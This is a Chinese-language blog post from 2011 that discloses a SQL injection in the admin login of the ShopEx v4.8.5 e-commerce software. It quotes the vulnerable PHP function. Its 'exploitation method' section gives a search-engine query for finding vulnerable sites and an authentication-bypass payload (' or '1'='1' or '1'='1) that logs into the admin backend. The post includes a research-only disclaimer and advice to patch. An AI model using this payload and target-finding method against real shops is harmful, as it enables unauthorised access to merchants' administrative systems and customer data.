Chinaunix首页 | 论坛 | 博客
  • 博客访问: 526396
  • 博文数量: 33
  • 博客积分: 3755
  • 博客等级: 中校
  • 技术积分: 496
  • 用 户 组: 普通用户
  • 注册时间: 2009-11-24 23:24
文章存档

2012年(14)

2011年(11)

2010年(7)

2009年(1)

分类: 系统运维

2011-10-24 15:21:47

shopex v4.8.5 漏洞

本人声明:

只做技术研究,请勿破坏….谢谢.

漏洞原因:

直接看代码:
public function tryLogin( $aValue, $issuper = false )
{
if ( $aValue['passwd'] == “+_-_-_+” )
{
$aValue['passwd'] = “”;
}
$sql = “SELECT * FROM sdb_operators WHERE username = ‘{$aValue['usrname']}’ AND userpass = ‘”.md5( $aValue['passwd'] ).”‘ AND disabled=’false’”;
if ( $issuper )
{
$sql .= ” AND super=’1′”;
}
return $this->db->selectrow( $sql );
}

这里$aValue['usrname']没有任何过滤直接查询(没想到shopex还爆这种低级漏洞)。

利用方法:

在baidu,google直接搜索 Powered by ShopEx v4.8.5

直接在后台登陆 用户名的地方输入

‘ or ’1′=’1′ or ’1′=’1

密码随便输,验证码输正确,直接进入后台。

SQL查询语句就变成这个样子了直接通过
SELECT * FROM sdb_operators WHERE username = ” or ’1′=’1′ or ’1′=’1′ AND userpass = ‘x’ AND disabled=’false’

看到此文章的shopex用户赶紧打官方的最新补丁….

阅读(12678) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~